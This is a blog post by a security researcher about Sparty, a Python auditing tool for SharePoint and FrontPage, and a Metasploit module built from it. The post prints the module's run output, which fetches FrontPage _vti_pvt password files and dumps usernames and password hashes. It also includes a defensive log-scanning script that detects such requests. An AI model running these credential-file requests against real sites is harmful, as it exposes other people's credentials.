Sparty: Useful Tools Die Hard!

Sparty was designed to conduct efficient security assessments of MS SharePoint deployments. The tool has been used by the security community, which shows its acceptance and highlights that the tool is useful.

Sparty was presented at BlackHat 2013 and the presentation is available at: https://media.blackhat.com/us-13/Arsenal/us-13-Sood-Sparty-Slides.pdf

Overview

Sparty is an open source tool written in Python to audit web applications using SharePoint and FrontPage architecture. The motivation behind this tool is to provide an easy and robust way to scrutinize the security configurations of SharePoint and FrontPage based web applications. Due to the complex nature of this web administration software, a simple and efficient tool is required that gathers information, checks access permissions, dumps critical information from default files and performs automated exploitation if security risks are identified. A number of automated scanners fall short of this, and Sparty is a solution to that.

The tool is hosted here: https://github.com/adityaks/sparty

Sparty has been enhanced by other researchers as well. Links are presented below.

https://github.com/0xdevalias/ then added support for “NTLM Authentication”, which was a good enhancement for testing authenticated MS SharePoint deployments.

More details here: https://blog.devalias.net/post/66844345127/sparty-sharepoint-frontpage-auditing-tool-now-with-more

Further, the Sparty source code has also been used to draft an “Auxiliary Scanner” module for the Metasploit Framework for the vulnerability reported many years ago. Details are presented below:

Vulnerability: https://insecure.org/sploits/Microsoft.frontpage.insecurities.html

Metasploit Framework Module — https://github.com/rapid7/metasploit-framework/pull/10534/files

https://www.rapid7.com/db/modules/auxiliary/scanner/http/frontpage_credential_dump

The msf module works (referenced from: https://github.com/rapid7/metasploit-framework/pull/10534/files ) as shown below:

msf auxiliary(scanner/http/frontpage_credential_dump) > run

[*] Requesting: /about/_vti_pvt/service.pwd
[*] Found /about/_vti_pvt/service.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 - service.pwd
[*] Requesting: /about/_vti_pvt/administrators.pwd
[*] Found /about/_vti_pvt/administrators.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 - administrators.pwd
[*] Requesting: /about/_vti_pvt/authors.pwd
[*] Found /about/_vti_pvt/authors.pwd.
[*] Found FrontPage credentials.
[+] 10.10.10.10 - authors.pwd

FrontPage Credentials
=====================

Source          Username    Password Hash
------          --------    -------------
Administrators  e-scan.com  xMyvw4d3c1oWY
Authors         e-scan.com  xMyvw4d3c1oWY
Service         e-scan.com  jLAsITPJ8AsaR

[*] Credentials saved in: /root/.msf4/loot/20180921124828_default_10.10.10.10_frontpage.creds_090555.txt
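
A defender-side check for the requests shown in the module output above, added here as an example (it is not code from Sparty or from the Metasploit module): it scans web server access logs for requests to the three _vti_pvt password files and separates requests the server answered with content from those it refused. The combined log format, the function name audit_access_log and the sample log lines are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Password files named in the module output above; matched case-insensitively
# because Windows-hosted servers resolve paths that way.
PWD_FILE = re.compile(r"/_vti_pvt/(service|administrators|authors)\.pwd$", re.I)
# Combined Log Format (assumed): client, request line, status, response size.
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def audit_access_log(lines):
    """Return {client: {"exposed": [...], "probed": [...]}} for .pwd requests."""
    findings = defaultdict(lambda: {"exposed": [], "probed": []})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        # Drop the query string, then decode percent-encoding before matching.
        path = unquote(m["target"].split("?", 1)[0])
        if not PWD_FILE.search(path):
            continue
        # A 2xx status means the file content was returned to the client.
        bucket = "exposed" if m["status"].startswith("2") else "probed"
        findings[m["client"]][bucket].append(path)
    return dict(findings)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.7 - - [21/Sep/2018:12:48:27 +0000] "GET /about/_vti_pvt/service.pwd HTTP/1.1" 200 54 "-" "-"',
    '192.0.2.7 - - [21/Sep/2018:12:48:27 +0000] "GET /about/_vti_pvt/administrators.pwd HTTP/1.1" 200 57 "-" "-"',
    '192.0.2.7 - - [21/Sep/2018:12:48:28 +0000] "GET /about/_VTI_PVT/authors%2Epwd?x=1 HTTP/1.1" 403 0 "-" "-"',
    '198.51.100.4 - - [21/Sep/2018:12:50:01 +0000] "GET /about/index.html HTTP/1.1" 200 5120 "-" "-"',
    'malformed line',
]

if __name__ == "__main__":
    for client, hits in audit_access_log(SAMPLE_LOG).items():
        print(client, "exposed:", hits["exposed"], "probed:", hits["probed"])
```

Any path listed under "exposed" means the server returned a password file, so the stored credentials should be treated as disclosed and access to _vti_pvt should be blocked.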

Rapid7 has added the auxiliary scanner “frontpage_credential_dump” to its module database, as the entry shown below indicates:

Rapid 7: Auxiliary Scanner

Note: Thanks to all the researchers who further contributed to enhance the tool. Appreciate the fact that work has been credited as well.

Learn, Share and Enjoy !